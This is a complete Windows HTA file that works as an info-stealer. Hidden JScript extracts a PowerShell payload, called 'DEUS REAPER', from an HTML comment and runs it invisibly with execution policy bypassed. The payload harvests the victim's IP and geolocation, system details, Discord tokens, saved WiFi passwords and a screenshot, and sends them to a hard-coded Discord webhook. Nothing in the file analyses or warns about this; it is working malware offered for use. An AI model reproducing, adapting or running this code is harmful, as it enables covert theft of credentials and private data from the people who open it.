<meta http-equiv="x-ua-compatible" content="ie=edge">
<hta:application 
    id="monolith" 
    applicationname="Monolith" 
    windowstate="minimize" 
    showintaskbar="no" 
    border="none" 
    caption="no" 
    sysmenu="no" 
    scroll="no">

<!--
The PowerShell payload is stored below, inside an HTML comment block.
The JScript will extract the content of this block and execute it.
Do not modify the <payload> or </payload> tags.

<payload>
# ===================================================
# DEUS REAPER - Embedded PowerShell Payload v5.0
# ===================================================

# --- CONFIGURATION ---
$WebhookURL = "https://discord.com/api/webhooks/1502379311577956374/Qkt2VOYWbwoBc85FzPUvQ0fHDn0qxPyqxu3kbComwCORP1rdu-D3xJjL9dE41X1okoPK"
$BotName = "Monolith Reaper"
$BotAvatar = "https://i.imgur.com/vWIJwqE.png"

# --- MAIN LOGIC ---
function Invoke-Reaper {
    $ErrorActionPreference = "SilentlyContinue"

    # --- Data Collection ---
    $SystemInfo = @{}
    $LocationInfo = @{}
    $DiscordTokens = New-Object System.Collections.ArrayList
    $WifiPasswords = New-Object System.Collections.ArrayList

    # Get Location & IP Info
    try {
        $LocationData = Invoke-RestMethod -Uri "https://ipinfo.io/json" -UseBasicParsing
        $LocationInfo = @{
            IP = $LocationData.ip
            City = $LocationData.city
            Region = $LocationData.region
            Country = $LocationData.country
            ISP = $LocationData.org
            MapLink = "https://www.google.com/maps/search/?api=1&query=$($LocationData.loc)"
        }
    } catch {}

    # Get System Info
    try {
        $ComputerInfo = Get-ComputerInfo
        $SystemInfo = @{
            Username = $env:USERNAME
            ComputerName = $env:COMPUTERNAME
            OS = $ComputerInfo.OsName
            RAM = "$([Math]::Round($ComputerInfo.TotalPhysicalMemory / 1GB)) GB"
            CPU = (Get-WmiObject -Class Win32_Processor).Name
            GPU = (Get-WmiObject -Class Win32_VideoController).Name
        }
    } catch {}

    # Get Discord Tokens
    try {
        $Paths = @("$env:APPDATA\discord\Local Storage\leveldb", "$env:APPDATA\discordcanary\Local Storage\leveldb", "$env:APPDATA\discordptb\Local Storage\leveldb", "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Local Storage\leveldb", "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Local Storage\leveldb")
        $Regex = '([a-zA-Z0-9_]{24}\.[a-zA-Z0-9_]{6}\.[a-zA-Z0-9_]{27}|mfa\.[a-zA-Z0-9_-]{84})'
        foreach ($Path in $Paths) {
            if (Test-Path $Path) {
                (Get-ChildItem -Path $Path -Filter *.ldb -File).FullName | ForEach-Object {
                    (Select-String -Path $_ -Pattern $Regex).Matches.Value | ForEach-Object {
                        if ($_.Trim() -ne "" -and !$DiscordTokens.Contains($_)) {
                            [void]$DiscordTokens.Add($_)
                        }
                    }
                }
            }
        }
    } catch {}

    # Get WiFi Passwords
    try {
        ((netsh wlan show profiles) | Select-String "All User Profile" | ForEach-Object { $_.ToString().Split(':')[1].Trim() }) | ForEach-Object {
            $SSID = $_
            $Password = ((netsh wlan show profile name="$SSID" key=clear) | Select-String "Key Content").ToString().Split(':')[1].Trim()
            if ($Password) {
                [void]$WifiPasswords.Add(@{ SSID = $SSID; Password = $Password })
            }
        }
    } catch {}
    
    # Take Screenshot
    $ScreenshotPath = "$env:TEMP\sys_capture.jpg"
    try {
        Add-Type -AssemblyName System.Drawing
        Add-Type -AssemblyName System.Windows.Forms
        $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
        $Bitmap = New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height
        $Graphics = [System.Drawing.Graphics]::FromImage($Bitmap)
        $Graphics.CopyFromScreen($Screen.Left, $Screen.Top, 0, 0, $Screen.Size)
        $Bitmap.Save($ScreenshotPath, [System.Drawing.Imaging.ImageFormat]::Jpeg)
    } catch {}

    # --- Send Payloads ---
    function Send-Embed {
        param($Embed)
        $Payload = @{ username = $BotName; avatar_url = $BotAvatar; embeds = @($Embed) } | ConvertTo-Json -Depth 5
        Invoke-RestMethod -Uri $WebhookURL -Method Post -ContentType "application/json" -Body $Payload -UseBasicParsing
    }

    $MainEmbed = @{
        title = "💀 Monolith Strike: $($SystemInfo.Username)@$($SystemInfo.ComputerName)"
        color = 16711680
        description = "**[Open Approx. Location]($($LocationInfo.MapLink))**"
        fields = @(@{ name = "IP Address"; value = "```$($LocationInfo.IP)```"; inline = $true }, @{ name = "Location"; value = "```$($LocationInfo.City), $($LocationInfo.Country)```"; inline = $true }, @{ name = "ISP"; value = "```$($LocationInfo.ISP)```"; inline = $true }, @{ name = "OS / RAM"; value = "```$($SystemInfo.OS) / $($SystemInfo.RAM)```"; inline = $false }, @{ name = "CPU"; value = "```$($SystemInfo.CPU)```"; inline = $false }, @{ name = "GPU"; value = "```$($SystemInfo.GPU)```"; inline = $false })
        timestamp = (Get-Date).ToUniversalTime().ToString("o")
    }
    Send-Embed -Embed $MainEmbed

    $TokensText = if ($DiscordTokens) { $DiscordTokens -join "`n" } else { "None found." }
    $WifiText = if ($WifiPasswords) { ($WifiPasswords | ForEach-Object { "SSID: $($_.SSID)`nPass: $($_.Password)" }) -join "`n`n" } else { "None found." }
    $CredsEmbed = @{
        title = "🔑 Credentials & Networks"
        color = 16776960
        description = "**Discord Tokens:**`n``````$($TokensText.Substring(0, [System.Math]::Min(1000, $TokensText.Length)))```````n**WiFi Passwords:**`n``````$($WifiText.Substring(0, [System.Math]::Min(2000, $WifiText.Length)))``````"
    }
    Send-Embed -Embed $CredsEmbed

    # Send Screenshot
    if (Test-Path $ScreenshotPath) {
        try { Invoke-RestMethod -Uri $WebhookURL -Method Post -InFile $ScreenshotPath -ContentType "multipart/form-data" } catch {}
        Remove-Item -Path $ScreenshotPath -Force
    }
}
Invoke-Reaper
</payload>

-->

<script language="JScript">
    try {
        var htaContent = document.documentElement.innerHTML;
        var payloadStart = htaContent.indexOf("<payload>") + "<payload>".length;
        var payloadEnd = htaContent.indexOf("</payload>");
        var psScript = htaContent.substring(payloadStart, payloadEnd).trim();

        // Base64 encode the script to avoid any issues with special characters in the command line
        var b64Script = toBase64(psScript);

        var command = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + b64Script;
        new ActiveXObject("WScript.Shell").Run(command, 0, false);
    } catch(e) {}
    
    // Base64 encoding function for JScript
    function toBase64(str) {
        var a = new ActiveXObject("System.Text.UTF8Encoding").GetBytes_4(str);
        var b = new ActiveXObject("MSXML2.DOMDocument").createElement("tmp");
        b.dataType = "bin.base64";
        b.nodeTypedValue = a;
        return b.text.replace(/\n/g, "");
    }

    window.close();
</script>
</html>
